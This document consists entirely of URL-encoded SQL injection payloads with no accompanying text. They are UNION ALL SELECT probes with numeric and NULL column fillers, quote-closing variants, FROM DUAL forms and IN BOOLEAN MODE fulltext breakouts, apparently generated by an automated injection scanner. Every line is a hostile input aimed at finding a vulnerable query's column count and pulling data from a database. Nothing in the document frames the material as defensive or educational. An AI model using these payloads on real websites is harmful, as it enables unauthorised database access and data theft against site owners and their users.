-1895%20%2B%20%28SELECT%205355%20FROM%20DUAL%20WHERE%203850%3D3850%20UNION%20ALL%20SELECT%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850%2C%203850--%20%20%29 -5037%20%2B%20%28SELECT%203378%20WHERE%203581%3D3581%20UNION%20ALL%20SELECT%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581%2C%203581--%20%20%29 -9375%20%2B%20%28SELECT%206193%20WHERE%208519%3D8519%20UNION%20ALL%20SELECT%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519%2C%208519--%20%20%29 -6171%20%2B%20%28SELECT%204772%20WHERE%206646%3D6646%20UNION%20ALL%20SELECT%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646%2C%206646--%20%20%29 -8772%20%2B%20%28SELECT%206279%20WHERE%209030%3D9030%20UNION%20ALL%20SELECT%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030%2C%209030--%20%20%29 -6228%20%2B%20%28SELECT%204878%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377--%20%20%29 -8918%20%2B%20%28SELECT%202391%20WHERE%209371%3D9371%20UNION%20ALL%20SELECT%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371--%20%20%29 -9863%20%2B%20%28SELECT%209574%20WHERE%207201%3D7201%20UNION%20ALL%20SELECT%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201%2C%207201--%20%20%29 -9528%20%2B%20%28SELECT%201716%20WHERE%206451%3D6451%20UNION%20ALL%20SELECT%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451--%20%20%29 -4086%20%2B%20%28SELECT%206077%20WHERE%206361%3D6361%20UNION%20ALL%20SELECT%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361--%20%20%29 -5367%20%2B%20%28SELECT%209837%20WHERE%207722%3D7722%20UNION%20ALL%20SELECT%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722--%20%20%29 -4043%27%20%2B%20%28SELECT%20%27oycU%27%20FROM%20DUAL%20WHERE%201287%3D1287%20UNION%20ALL%20SELECT%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287%2C%201287--%20%20%29%20%2B%20%27 -2732%27%20%2B%20%28SELECT%20%27DlMD%27%20FROM%20DUAL%20WHERE%204712%3D4712%20UNION%20ALL%20SELECT%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712%2C%204712--%20%20%29%20%2B%20%27 -7954%27%20%2B%20%28SELECT%20%27jJNU%27%20FROM%20DUAL%20WHERE%209684%3D9684%20UNION%20ALL%20SELECT%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684--%20%20%29%20%2B%20%27 -6703%27%20%2B%20%28SELECT%20%27jDdf%27%20FROM%20DUAL%20WHERE%202099%3D2099%20UNION%20ALL%20SELECT%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099--%20%20%29%20%2B%20%27 -8464%27%20%2B%20%28SELECT%20%27RKsi%27%20FROM%20DUAL%20WHERE%204609%3D4609%20UNION%20ALL%20SELECT%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609%2C%204609--%20%20%29%20%2B%20%27 -2919%27%20%2B%20%28SELECT%20%27rYxN%27%20FROM%20DUAL%20WHERE%204011%3D4011%20UNION%20ALL%20SELECT%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011%2C%204011--%20%20%29%20%2B%20%27 -3435%27%20%2B%20%28SELECT%20%27RhIO%27%20FROM%20DUAL%20WHERE%204503%3D4503%20UNION%20ALL%20SELECT%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503%2C%204503--%20%20%29%20%2B%20%27 -5864%27%20%2B%20%28SELECT%20%27RMUZ%27%20FROM%20DUAL%20WHERE%203021%3D3021%20UNION%20ALL%20SELECT%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021--%20%20%29%20%2B%20%27 -8831%27%20%2B%20%28SELECT%20%27caKu%27%20FROM%20DUAL%20WHERE%207722%3D7722%20UNION%20ALL%20SELECT%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722--%20%20%29%20%2B%20%27 -9913%27%20%2B%20%28SELECT%20%27Razf%27%20FROM%20DUAL%20WHERE%204249%3D4249%20UNION%20ALL%20SELECT%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249--%20%20%29%20%2B%20%27 -2781%27%20%2B%20%28SELECT%20%27Jfci%27%20WHERE%206305%3D6305%20UNION%20ALL%20SELECT%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305--%20%20%29%20%2B%20%27 -1215%27%20%2B%20%28SELECT%20%27vHUk%27%20WHERE%203555%3D3555%20UNION%20ALL%20SELECT%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555%2C%203555--%20%20%29%20%2B%20%27 -7049%27%20%2B%20%28SELECT%20%27VMFs%27%20WHERE%206390%3D6390%20UNION%20ALL%20SELECT%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390--%20%20%29%20%2B%20%27 -1893%27%20%2B%20%28SELECT%20%27PkfU%27%20WHERE%203645%3D3645%20UNION%20ALL%20SELECT%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645%2C%203645--%20%20%29%20%2B%20%27 -7406%27%20%2B%20%28SELECT%20%27Cxqh%27%20WHERE%206640%3D6640%20UNION%20ALL%20SELECT%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640%2C%206640--%20%20%29%20%2B%20%27 -7343%27%20%2B%20%28SELECT%20%27whec%27%20WHERE%205747%3D5747%20UNION%20ALL%20SELECT%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747--%20%20%29%20%2B%20%27 -3567%27%20%2B%20%28SELECT%20%27iiKK%27%20WHERE%201579%3D1579%20UNION%20ALL%20SELECT%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579%2C%201579--%20%20%29%20%2B%20%27 -2899%27%20%2B%20%28SELECT%20%27aPha%27%20WHERE%208191%3D8191%20UNION%20ALL%20SELECT%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191--%20%20%29%20%2B%20%27 -1636%27%20%2B%20%28SELECT%20%27yKkC%27%20WHERE%208326%3D8326%20UNION%20ALL%20SELECT%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326--%20%20%29%20%2B%20%27 -8341%27%20%2B%20%28SELECT%20%27tmug%27%20WHERE%206080%3D6080%20UNION%20ALL%20SELECT%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080%2C%206080--%20%20%29%20%2B%20%27 -4476%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490%2C%209490--%20%20%23 -2053%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893%2C%201893--%20%20%23 -3950%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420--%20%20%23 -7448%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743%2C%206743--%20%20%23 -2061%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178%2C%206178--%20%20%23 -2605%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012--%20%20%23 -7158%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740--%20%20%23 -9336%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261%2C%203261--%20%20%23 -1190%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219%2C%204219--%20%20%23 -4951%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060%2C%205060--%20%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 